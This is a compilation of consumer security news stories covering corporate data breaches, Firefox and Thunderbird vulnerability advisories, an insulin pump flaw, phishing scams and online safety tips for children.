IT NEWS

On Tuesday, the Securities and Exchange Commission (SEC) charged financial company Morgan Stanley a $35M fine for “the firm’s extensive failures, over five years, to protect the personal identifying information, or PII, of approximately 15 million customers. The company agreed to settle the penalty.

As early as 2015, Morgan Stanley wasn’t properly disposing of devices containing sensitive customer data, according to a press release. In one instance, it hired a moving company with “no experience or expertise” in data destruction to eliminate thousands of devices containing hard drives and servers with thousands of unencrypted customer data. The company later auctioned these devices online with data still intact.

Gurbir Grewal, the SEC’s director of the Division of Enforcement, described Morgan Stanley’s failures as “astonishing”.

“Customers entrust their personal information to financial professionals with the understanding and expectation that it will be protected, and MSSB fell woefully short in doing so,” Grewal said in a statement. “If not properly safeguarded, this sensitive information can end up in the wrong hands and have disastrous consequences for investors. Today’s action sends a clear message to financial institutions that they must take seriously their obligation to safeguard such data.”

Morgan Stanley recovered some of the re-sold assets, but “a vast majority” of these devices were not.

On top of that, 42 servers, potentially containing unencrypted data by the thousands, from a local office and branch servers Morgan Stanley shut down went “missing”.

Regardless of the amount of data that was “misplaced” for seven years, the company said it’s not aware any of the lost sensitive data were exploited.

“We have previously notified applicable clients regarding these matters, which occurred several years ago, and have not detected any unauthorized access to, or misuse of, personal client information,” a spokesperson from Morgan Stanley said in a statement to CNN.

Mozilla has released security updates to address vulnerabilities in Firefox, Firefox ESR, and Thunderbird. An attacker could exploit some of these vulnerabilities to take control of an affected system.

In Firefox 105 a total of seven vulnerabilities were patched, three of which received the security risk rating “high”. In Thunderbird three security vulnerabilities were patched. One with the rating “high” risk.

Security advisories were published for Firefox 105, Firefox ESR 102.3, and Thunderbird 91.13.1. Firefox 105 is the browser most Mozilla users will have on their system. Firefox Extended Support Release (ESR) is an official version of Firefox developed for large organizations that need to set up and maintain Firefox on a large scale. Thunderbird is Mozilla’s free email application.

How to update

To find out which version you are using on a Windows machine, open the application menu and click on Help > About. On a Mac, look at the top menu and click Firefox > About Firefox. This will show which version you currently have and whether an update is available. On Android use the My apps & games item in the PlayStore side-menu and find Firefox Browser in the list. Use the Update button next to it.

Downloading available update screen Firefox

The screens and the way to access them are largely the same for all Mozilla programs, including Thunderbird.

Once you’ve updated, you’re protected against these vulnerabilities.

Stay safe everyone!

The technical details

Firefox vulnerabilities

CVE-2022-40959: (High) Bypassing FeaturePolicy restrictions on transient pages. During iframe navigation, certain pages didn’t have their FeaturePolicy fully initialized leading to a bypass that leaked device permissions into untrusted subdocuments. The HTTP Feature-Policy header provides a mechanism to allow and deny the use of browser features in its own frame, and in content within any iframe elements in the document.

CVE-2022-40960: (High) Data-race when parsing non-UTF-8 URLs in threads. Concurrent use of the URL parser with non-UTF-8 data was not thread-safe. This could lead to a use-after-free causing a potentially exploitable crash. UTF-8 is an encoding system for Unicode characters. It can translate any Unicode character into a matching unique binary string. A non-UTF-8 character is a sequence of bytes that is not a valid UTF-8 character. Since UTF-8 as character encoding was introduced in 2005, there may be still some URLs which use a different encoding. Or they could be constructed to exploit this vulnerability.

CVE-2022-40962: (High )Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3. These bugs were found by Mozilla developers and the Mozilla Fuzzing Team. Some of these bugs showed evidence of memory corruption and it is likely that with enough effort some of these could have been exploited to run arbitrary code.

CVE-2022-40958: (Moderate) Bypassing Secure Context restriction for cookies with __Host and __Secure prefix. By injecting a cookie with certain special characters, an attacker on a shared subdomain which is not a secure context could set and thus overwrite cookies from a secure context, leading to session fixation and other attacks. In a session fixation attack, the attacker already has access to a valid session and tries to force the victim to use that particular session for his or her own purposes. In such a case the attack is initiated before the user logs in and the session fixation attack fixes an established session on the victim’s browser.

CVE-2022-40961: (Moderate) Stack-buffer overflow when initializing Graphics. During startup, a graphics driver with an unexpected name could lead to a stack-buffer overflow causing a potentially exploitable crash. This issue only affects Firefox for Android. Other operating systems are not affected.

CVE-2022-40956: (Low) Content-Security-Policy (CSP) base-uri bypass. When injecting an HTML base element, some requests would ignore the CSP’s base-uri settings and accept the injected element’s base instead. The HTTP CSP base-uri directive restricts the URLs which can be used in a document’s <base> element.

CVE-2022-40957: (Low) Incoherent instruction cache when building WASM on ARM64. Inconsistent data in instruction and data cache when creating wasm code could lead to a potentially exploitable crash. Wasm is designed as a portable compilation target for programming languages, enabling deployment on the web for client and server applications. This bug only affects Firefox on ARM64 platforms. ARM64 is the architecture used by newer Macs built on Apple Silicon, shipped in late 2020 and beyond.

Thunderbird

CVE-2022-3033: (High) Leaking of sensitive information when composing a response to an HTML email with a META refresh tag. If a Thunderbird user replied to a crafted HTML email containing a meta tag, with the meta tag having the http-equiv=”refresh” attribute, and the content attribute specifying an URL, then Thunderbird started a network request to that URL, regardless of the configuration to block remote content. In combination with certain other HTML elements and attributes in the email, it was possible to execute JavaScript code included in the message in the context of the message compose document. This bug doesn’t affect Thunderbird users who have changed the default Message Body display setting to ‘simple html’ or ‘plain text’.

CVE-2022-3032: (Moderate) When receiving an HTML email that contained an iframe element, which used a srcdoc attribute to define the inner HTML document, remote objects specified in the nested document, for example images or videos, were not blocked. Rather, the network was accessed, the objects were loaded and displayed.

CVE-2022-3034: (Moderate) An iframe element in an HTML email could trigger a network request. When receiving an HTML email that specified to load an iframe element from a remote location, a request to the remote document was sent. However, Thunderbird didn’t display the document.

The US FDA (Food and Drug Administration) has warned users of Medtronic’s MiniMed 600 Series Insulin Pump System—specifically, models for MiniMed 630G and MiniMed 670G—that their medical devices have a cybersecurity issue with its communication protocol. If compromised, attackers could gain unauthorized access to the pump system itself, and alter it to deliver too much or too little insulin to the patient.

Because the MiniMed 600 series devices have components (the insulin pump, the blood glucose meter, the continuous glucose monitoring transmitter, and the CareLink USB device) that communicate wirelessly, nearby attackers could gain unauthorized access to them when the pump is paired with these components. Medtronic clearly stated that such an attack could not be done over the internet.

“Medtronic has no evidence to date that such an issue has occurred,” the company’s Urgent Medical Device Correction notification page states. “However, in the unlikely event that unauthorized access would be successful, the access could be used to deliver too much or too little insulin through delivery of an unintended insulin bolus or because insulin delivery is slowed or stopped. Too much insulin could result in hypoglycemia (low blood sugar) which can potentially lead to seizure, coma or death. Too little insulin could result in hyperglycemia (high blood sugar) which can potentially lead to diabetic ketoacidosis.”

The FDA continues to work with Medtronic to identify, communicate, and prevent the devices’ vulnerability effects. Medtronic advises taking action and the necessary precautions to avoid being at risk. First, the company advises users to turn off the “Remote Bolus” feature of the pump, which is on by default.

The company also reminded users to keep their insulin pump and its components within their control at all times, never confirm connection requests on the pump screen unless initiated by them or their care partner, and not share their insulin pump’s or device’s serial numbers with anyone but their healthcare provider, distributor, and Medtronic. A detailed list of precautions can be found on this page.

Watch out for an energy-themed scam being sent out via SMS. The message plays on energy price fears, similar to what we’ve seen previously.

Scam alert. I just received this text. Click through and it looks very official. It’s a scam. The £400 energy bill discount is automatic, you don’t need to register or share any details with anyone. Please be aware. pic.twitter.com/76bT9YSkOy

— Marc Ashdown (@marcashdown) September 20, 2022

It reads as follows:

GOVUK: We have identified you as eligible for a discounted energy bill under the Energy Bills Support Scheme. You can apply here [URL]

The message, which claims to be from the UK government, directs clickers to a phishing page which resembles a typical gov.uk website.

Energy Bills Support Scheme

Register now to receive a £400 non-repayable discount under the Energy Bills Support Scheme.

Anyone “registering” to the website may well find themselves out of pocket. Considering those most likely to respond to such a message may be people already struggling financially, this is a particularly despicable attack.

Phishing for info

The pattern followed by this site is typical of this kind of attack. First it asks potential victims to enter a variety of personal information:

• Name

• Date of birth

• Phone number

• Address

• City

• Postcode

Once this is done, the site asks for your current energy supplier, and provides a list of pre-fills.

The site eventually asks for:

• Card number
• Card expiry date
• Card security code

It also places the logo of whichever company you’ve selected at the top of the page, along with the following message:

This should be the account linked to your [business name] account. This is the account your supplier will send the payments to.

It’s worth noting that the URL is already being flagged by some browsers. For example, Chrome will make you confirm that you want to visit the site, ignoring its prominent “this site is bogus” warning. If you actually visit the page despite this, it’s also tagged as “Dangerous” where the green padlock in the URL bar is located. Users of Malwarebytes are protected from the phishing URL used in this attack.

How to avoid energy scams

• Phone calls, emails, and random SMS messages asking for payment information are not going to be legitimate. You should also never be asked for login details for your online banking or other accounts from a cold-caller.
• If you receive an unexpected call about energy prices or rebates, insist on calling “them” back on their official number taken from an official website directly. If the caller objects to this, that’s an immediate red flag. A genuine caller would have no possible reason to object to this.
• Bogus fake energy company websites are very popular and easy to set up. Visit the official website listed in official correspondence only, and pay close attention to URLs sent to you by text or email. Don’t trust sites sent your way in relation to any money back, discount, or rebate offer.

Stay safe out there!

With children now back at school, it’s time to think about social media, and their use of it.

Are they already firing out tweets, chatting in Discord channels, or even just looking to set up a Tik-Tok account? Now is the time to consider giving your kids some security and privacy tips for all their social media needs.

1. Get to grips with default settings

Most sites are in the business of making your data their business. EULAs and privacy policies are frequently terribly confusing for grown ups. Expecting a child to make sense of 1,000 very legal words is unfeasible. Social networks are absolutely in the business of providing services for free, and then using analytics to drive advertising on their sites.

Often, privacy settings are defaulted in a way which makes it easier for marketing/advertising/data-gulping to take place. Some examples:

• Allow third party/relevant advertising tailored to your interests

• GPS location set to on (usually ties into the targeted advertising point above)

• Find your friends (in other words, import your address book and make connections between email addresses and social media profiles)

These are things which may sound helpful, and no doubt are to some, but everybody using an app does not need any or all of these enabled by default. With this in mind, here’s what to tell your kid about default settings:

Look out for anything mentioning offers, location, advertising, relevant content, and finding friends. All of these options and settings help the site you’re using to operate, but they’re not necessarily going be helpful for you too. Before you start posting, ensure options like location in particular are disabled unless you have a very good reason for needing it.

2. It’s all about location

We touched on this briefly above, but this is a key component of your “Please watch out for these things” conversation. Trolling. Doxxing (grabbing personal details in a way which identifies an individual and then publishing them online). Swatting (sending fake emergency calls to law enforcement which results in armed officers crashing through your door). All of these things are very bad, and you don’t want your child getting tangled up in any of it.

Sadly, location services on social networks can cause problems in this area. Sometimes location is kept private for the user only. Other times, the location is in full view. It may be somewhat generic and say a major city like London, or it may drill down to a street.

Even without tech related issues or troublesome settings, the real-world can also give details away. Thanks to open-source tools, reverse image searches, and crowd-sourcing data, it’s never been easier to give the locational game away:

• A letter in a photograph with your address on it
• Unique identifiers (views outside a window, for example)
• Regional dialects or other specific references in the background of video footage

Almost anything can provide somebody with the clue to get an idea of where your child may be living. Here’s what to tell your child:

Pay close attention to the world around you if you’re a fan of streaming, Tik-Tok, or selfies. Keep your home, identifiable locations, and anything with your name and address on it out of shot. Even grown ups make these mistakes, so it’s very easy to accidentally do it yourself. Oh, and if you’re going on holiday you may wish to reference it only once you’ve returned home. Tales of empty houses being broadcast to the world at large on social media may not end well.

3. The value of anonymity

Back in the olden days, most of us were online using a pseudonym. It wasn’t massively common to have your real name or other potentially unique identifiers following you around from site to site. In fact, for the first few years of my security career, writers and journalists referred to me as my online handle because they didn’t actually know my name.

This is a far cry from what we currently have, with real names everywhere, verified profiles, authentication, and the common refrain that only people with something to hide don’t use their real name.

The reality is, people don’t use their real name online for all sorts of valid reasons. There might be domestic abuse or harassment issues. They may live somewhere where free speech or being critical of their government is frowned upon.

However, it’s important to note that you don’t have to be in one of the above awful scenarios to insist on anonymity of one form or another. Indeed, going down the anonymous route from the get-go may help ward off potentially unpleasant situations at a future date anyway.

Most sites will allow you to use whatever visible username you like. A few insist on real names, but it’s unlikely your kids are currently hanging out on Facebook. While you’re usually asked to put a real name alongside your online handle, it’s not mandatory and there’s a good chance nobody will ever check what you put there. Nor are the platforms likely to suddenly lock an account and demand additional verification of some kind at a later date. Here’s what you should tell your children about this issue:

There’s nothing wrong with being anonymous on social media, and unless the site explicitly asks for a real name and additional information you shouldn’t feel pressured into handing it over. Keeping yourself anonymous also helps to ward off some of the issues related to location oversharing. Pick the level of generic anonymity that you’re comfortable with.

4. Watch out for the fakers

Social media is rife with scams, and scammers will happily target anyone in front of them. In fact, some will actively target children specifically because of their likely inexperience in spotting a fake-out. Kids are also unlikely to use additional security measures like two-factor authentication. This means less work for the attacker. Fortunately you can help with this.

Any platform you can think of has scams particularly suited to it. Instagram is awash with Bitcoin scams and bogus competitions. Twitter has lots of phishing, NFT scams, bogus video game downloads, and get rich quick schemes. Facebook sees a fair amount of fake PlayStation sales and more generic Messenger scams. Compromised verified accounts, which add legitimacy to fraud, are common across all platforms.

What you should tell your kids:

Every site has its own groups of scammers, each with their own preferred method of attack. Spend a few minutes reading the site’s security pages to ensure you keep your account safe from harm. If an offer or deal sounds too good to be true, it probably is. Very few social media giveaways are genuine.

If you receive direct messages from strangers, or you’ve been notified that you violated a website policy and need to re-verify your identity, come and tell us and we’ll take a look for you. Never, ever grant someone access to your account…even if they claim to be employees for the site. This is never going to be a genuine request from a member of staff and you may lose your account.

5. Be honest and respect privacy

Many times, young children and teens don’t want the hassle of locking everything down and micromanaging passwords or security settings. They may already have email addresses and various social media accounts. Are those email addresses locked down? Using two-factor authentication? Do your kids know their way around the various security settings across all of their logins? How about password managers?

In these cases, parents often offer to help. Where younger children are concerned, I know some parents who use one of their pre-locked down email addresses to tie social media accounts to. Most of the time, you don’t really need to do much with whatever address you link to Twitter or Tik-Tok or anywhere else, you just need it to tie your username to. As a result, hooking the accounts to a secure email managed by parents can be a quick and easy win for everybody.

Of course, there are privacy issues here to consider. The older the child, the more likely they may be to send other social media users direct messages. Parents should be open about this; some platforms send a digest of all private messages to the connected email account. You can turn this feature on and off in Twitter, for example, but every site is different. You should see how your child feels about this. Some may not care, but others most definitely will. What to tell them:

I’m happy to micromanage the security practices behind the scenes. The trade-off is that some, or all, of what you do may be sent back to me through the email used to register the account. We can check how the site in question works in relation to this, and set it in a way you’d be comfortable with. Remember that sites often change existing features or add new ones, and we may have to adjust as we go.

Closing out the Summer

It’s not easy getting kids ready to go back to school. It’s even trickier to ensure they keep themselves safe from harm online. We hope the advice above will be helpful to you in getting one of those two gargantuan tasks off the table. Stay safe out there!

The United States Attorney for the Southern District of New York has sentenced Ariel “Melo” Jimenez (38) to 12 years in prison for leading a “tax fraud and identity theft conspiracy” that resulted in the fraudulent claiming of tax credits, earning him millions of dollars.

“Ariel Jimenez was the leader of a long-running fraudulent tax business that cheated the Government of tax refunds by stealing the identities of vulnerable children and using those identities to falsely claim tax credits on behalf of his clients,” said US Attorney General Damian Williams in a press release. “Today’s sentence holds Jimenez accountable for brazenly selling the identities of children to his customers for his own profit.”

Jimenez was arrested with eight of his co-conspirators: Evelin Jimenez and Ana Yessenia Jimenez, his sisters; Ireline Nunez, Leyvi Castillo, Cinthia Federo, Guillermo Arias Moncion, Marcos “Junior” De Jesus Pantaleon, and Jose “Jairo” Castillo. The unsealed complaint mentioned a “corrupt New York City employee” and a “cooperating witness” (CW-1), but it didn’t name them.

Modus operandi

According to the complaint, Jimenez conspired with a fraud investigator (known as “CW-1”) within the New York City Human Resources Administration (HRA) when he established his tax fraud business in 2007 in the Bronx. The NYC HRA is a government organization tasked with providing food and emergency rental assistance for those in need.

CW-1 admitted to stealing children’s data, which comprised their names, dates of birth, and SSNs (Social Security Numbers), from the Welfare Management System and selling these to Jimenez. Jimenez would then list these children as dependents on tax returns Jimenez prepared for his clients. Jimenez and his team are said to have callously referred to these children’s identities as “pollitos” (“little chickens” or “chicks” in Spanish).

Jimenez would charge his clients between $1,000 and $1,500 per child he’d fraudulently add to their tax returns. These children are included as false dependents so the taxpayers (Jimenez’s clients) can file for inflated tax refunds.

“Jimenez’s use of stolen identities harmed the actual caretakers of the children who were fraudulently claimed as dependents,” the press release states. “In some cases, the people actually taking care of these children had much-needed tax refunds delayed and were required to prove their actual connection to their own dependent children.”

A lavish lifestyle

Since setting up his business in 2007, Jimenez has amassed millions of dollars, which he used to purchase real estate and fund a lavish lifestyle. He admitted to spending a total of $5.5M buying properties in the US and abroad and buying jewelry, cars, and gambling. He transferred several properties to his parents to hide his source of funds.

On top of a 12-year sentence, Jimenez was ordered to give up three of his properties and pay forfeiture amounting to $14.580M. He was also ordered to pay restitution for $44,769,906.

There’s been some smart phishing campaigns running over the last few weeks, and this one is particularly sneaky. Bleeping Computer reports that a phishing page is targeting Greek taxpayers with a tax refund scam. The added sting in the tail comes in the form of an embedded keylogger which grabs everything entered onto the page.

An untimely tax refund

The phishing mails rely on that time-honoured tradition of bogus tax returns and non-existent refunds. The landing page, which mimics an official gov.gr portal, reads as follows:

The Hellenic Tax Office has calculated your tax return, you are entitled to a tax refund of Є634.13 (around $633 USD). We have tried to transfer the amount to your account. Unfortunately we were unable to confirm your current account number.

What follows is a drop-down form where the victim can select their bank and “log into the portal”. According to researchers at Cyble, there are several URLs being used to phish victims and they all do a decent job of imitating the real deal. Multiple major banks are listed in the drop-down menu, and the bogus bank pages closely resemble the real thing. Unfortunately for site visitors, this is where the previously mentioned sting in the tail comes into play.

A sneaky way to grab data

Phishing sites typically rely on the visitor hitting the submit button to send their personal information into the hands of the scammers. If someone realises something isn’t quite right at the last minute and abandons ship, the scammers are left with nothing.

In this case, the site has an embedded JavaScript keylogger ticking away in the background. What this means is that anything entered into the various entry boxes is grabbed via the keylogger and immediately sent to the fraudsters. In this scenario, realising something is wrong may not save the victim. Anything they punched into the site up to that point will already be waiting for the phisher to retrieve at their leisure. Sure, they may have only entered information which won’t help attackers, but smart scammers using this technique will likely front load entry forms with the important details first.

What can you do?

Tools used to block third-party trackers reportedly aren’t effective against this kind of embed. With that being the case:

• Tax refunds are rather rare for most people, so question the authenticity of such a claim should you receive one. Contact your local tax authority directly. Many host an up-to-date list of common and current tax scams, which may help to answer your question before you’ve even picked up the phone.

• Rogue attachments are common where fake tax refunds are concerned. If you happen to open a file from someone you weren’t expecting, don’t disable your software’s “read only” mode or its closest equivalent. Steer clear of enabling Macros, too.

• If you believe you’ve entered any data on a phishing site, there’s a small chance it may have a JavaScript keylogger running under the hood. If you know your way around code, you might be able to spot it. If not, you’re left with the hassle of trying to figure out if you need to take some action. Did the site ask for logins upfront, before anything else? Payment details? Certain forms of personal information? It’s time to do a small risk assessment checklist, and then make the appropriate decision as to whether you need to change passwords, cancel your card, or more.

Malwarebytes users are protected from the domains used in this attack. Stay safe out there!

For games publisher Take-Two Interactive, damage control is in full effect as word spreads of a Grand Theft Auto-centric network compromise. Developer Rockstar Games has suffered a major leak of upcoming game content, specifically unfinished video footage of Grand Theft Auto 6. The first anyone knew of the attack was when the person doing the compromising posted their spoils to the popular gaming site GTAForums on Sunday. A very bad weekend lay in store for the embattled game developers.

To the forums!

The post linking the content, now edited, was made to this thread on Sunday with the following message:

Here are 90 footage/clips from GTA 6. 

It’s possible i could leak more data soon, GTA 5 and 6 source code and assets, GTA 6 testing build.

Initially the “leak” was met with scepticism. There’s a long history of pranks and scams where supposedly stolen footage of upcoming Rockstar games are concerned. The stolen footage inevitably turns out to be re-edits of older game footage, or even shoddy looking content put together by the theoretical leaker in game development tools. Indeed, the reactions from multiple posters in the thread itself were dismissive of the content on display. However, they were about to change their tune.

The breach confirmed

It’s never a good sign when an organisation has to post up a tweet like the below:

A Message from Rockstar Games pic.twitter.com/T4Wztu8RW8

— Rockstar Games (@RockstarGames) September 19, 2022

The tweet confirms that Rockstar Games suffered a network intrusion, with an unauthorised third party accessing and downloading confidential information and development footage of the unreleased GTA 6. This tweet comes alongside a security filing which adds a little more detail to the current state of play:

Rockstar Games recently experienced a network intrusion in which an unauthorized third party illegally accessed and downloaded confidential information from its systems, including early development footage for the next Grand Theft Auto. Current Rockstar Games services are unaffected.

We have already taken steps to isolate and contain this incident. Work on the game will continue as planned. At this time, Rockstar Games does not anticipate any disruption to its current services nor any long-term effect on its development timelines as a result of this incident.

There isn’t a lot else to go on at time of writing, with Take-Two Interactive and Rockstar Games getting to grips with figuring out what happened, and if the attacker still has network access. There’s also the possibility of additional content leaks or some form of blackmail. Meanwhile, all we really have from the attacker is that the videos were “downloaded from Slack”. Clearly Rockstar Games will be very busy over the coming days and weeks.

Avoid the inevitable GTA6 scams

The leaked content will almost certainly keep popping up on sites such as YouTube and social media portals. What eager gamers need to watch out for is the scam aspect that will naturally attach itself, limpet style, to the footage. Based on what we’ve seen down the years in relation to gaming leaks, these are some of the things you should be very wary of:

• Nobody is offering up a fully playable version of GTA6 on YouTube or anywhere else. Should you see such a claim, don’t take the bait and ignore/report the video as appropriate.

• There is no leaked early-access style playable demo of the stolen content. Offers of playable GTA6 are almost certainly locked behind survey scams, and/or bundled with malware files. Ignore them.

• On a similar note, emails from strangers claiming to offer up versions of GTA6 either as a download or as part of some sort of subscription service should be given a wide berth.

• Depending on platform or title, you may need to login to Rockstar Social Club to play your Rockstar games. It’s possible phishers may set up a scam which asks for logins in order to access fictitious versions of GTA6. Under no circumstance should you hand out your gaming logins to anybody.

Stay safe out there!

Major airline American Airlines has fallen victim to a data breach after a threat actor got access to the email accounts of several employees via a phishing attack.

According to a published notice of a security incident, the data breach was discovered in July 2022.

How it happened

American Airlines said the successful phishing attack led to the unauthorized access of a limited number of team member mailboxes. American Airlines discovered the breach on July 5, 2022 and immediately secured the impacted email accounts. It then hired a cybersecurity forensic firm to investigate the security incident. A forensic investigation can be a huge help to determine what happened and what the possible consequences of the incident are.

What the attackers had access to

In the notice, American Airlines wrote:

“The personal information involved in this incident may have included your name, date of birth, mailing address, phone number, email address, driver’s license number, passport number, and/or certain medical information you provided.”

So far, American Airlines has not disclosed the exact number of breached email accounts or how many customers were affected.

Aftermath

American Airlines says it will implement additional technical safeguards to prevent a similar incident from happening in the future.

It offers affected customers a complimentary two-year membership of Experian’s IdentityWorksSM. While we would not recommend paying for such a service, getting it for free may not be a bad deal. Identity theft monitoring services sound great at first, they’re not really expensive and seem to provide peace of mind against an avalanche of ever-more damaging breaches. But they don’t, at present, protect against the worst impacts of identity theft—the theft itself.

American Airlines says it has no evidence that personal information has been abused, but recommends that you enroll in the free credit monitoring. In addition, customers should be extra vigilant, including by regularly reviewing account statements and monitoring free credit reports.

Phishing

We’d like to add that this type of incident often triggers yet another round of phishing attacks, only targeted at potentially affected customers. Typically these phishing mails will try to leverage some kind of urgency to try and trick you. For example, they might urge you to click some link to claim some sort of compensation for the incident. The sense of urgency is something almost all phishing mails have in common: They do not want you to think, just react.

Other signs that something’s phishy:

• The email, text, or voicemail is requesting that you update/fill in personal information. This is especially dubious if it’s coming from a bank or the IRS. Treat any communication asking for your credentials with extra caution.
• The URL shown on the email and the URL that displays when you hover over the link are different from one another.
• The “From” address is an imitation of a legitimate address, especially from a business.
• The formatting and design are different from what you usually receive from an organization. Maybe the logo looks pixelated or the buttons are different colors. Or possibly there are weird paragraph breaks or extra spaces between words. If the email appears sloppy, start making the squinty “this looks suspect” face.
• The content is badly written. Sure, there are plenty of bad writers working for legitimate organizations, but this email might seem particularly amateur. Are there obvious grammar errors? Is there awkward sentence structure, like perhaps it was written by a computer program or someone whose second language is English?
• The email contains attachments from unknown sources that you were not expecting.
• The website you are sent to is not secure. If you do go ahead and click on the link of an email to fill out personal information, be sure you see the “https” abbreviation as well as the lock symbol at the beginning of the URL. If not, that means any data you submit is vulnerable to cybercriminals. (If the link is malicious, Malwarebytes will block the site.)

And each of the above is reason enough to question the legitimacy of the email. Phishers have far evolved past the “Nigerian prince with a treasure” level. Above all else, trust your instincts—if it looks, smells, or feels phishy then it probably is.

Stay safe, everyone!

The operators of a site known to most observers for being in a recent state of flux have announced a forum breach. Kiwi Farms, which gained a reputation for sophisticated trolling and doxxing, was recently dropped by Cloudflare after a sustained campaign to have the DDoS mitigation and cloud hosting service abandon the forum.

The site has since returned, but with a major problem: a breach which potentially reveals a large amount of user data.

The breach revealed

The site creator had the following to say in relation to the compromise:

The forum was hacked. You should assume the following.

Assume your password for the Kiwi Farms has been stolen.

Assume your email has been leaked.

Assume any IP you’ve used on your Kiwi Farms account in the last month has been leaked.

The attack made use of the synergy between the main forum site and a second site, XenForo. The latter is a commercial internet forum software package written in PHP. Attackers created a webpage disguised as an audio file to XenForo, loading this page elsewhere in a manner which caused user authentication cookies to be sent off-site. The main admin account for the forum was apparently hijacked in this same fashion.

The fallout from a forum compromise

We often warn about using forums without implementing the proper failsafes and protection, and a breach such as this hammers home the point. A lot of users on the site may now have a lot of information exposed that they’d really rather not. Similarly, curious observers or even unwary researchers or law enforcement may have registered and not considered the possibility of a data leak.

This data could end up anywhere, and there’s no surefire way to know what’s been taken. It could end up on other forums, data dumps, or in the hands of law enforcement agencies. No matter what site you’re registered on, you should consider:

• Use different passwords for all sites. Once those data dumps go public, cybercriminals will try logging in to other accounts using the same email and username combinations.

• Consider using a VPN, TOR, or some other method to obscure your IP address. Some forums insist on people using their real IP address when registering and posting to a forum, and may even ban or block VPNS, proxies, and other services.

• Be careful what you reveal to other site users via direct messages. People tend to not delete these messages, and sites don’t always auto-prune older messages. It’s also possible sites may store data sent and received, and not even tell you.

It remains to be seen what happens to Kiwi Farms, and the site owner is looking to migrate away from aspects of the site which led to this compromise. For now, it’s a timely reminder to keep on top of potential system vulnerabilities and also consider what data you may be leaving on a site for others to collect at the worst possible moment.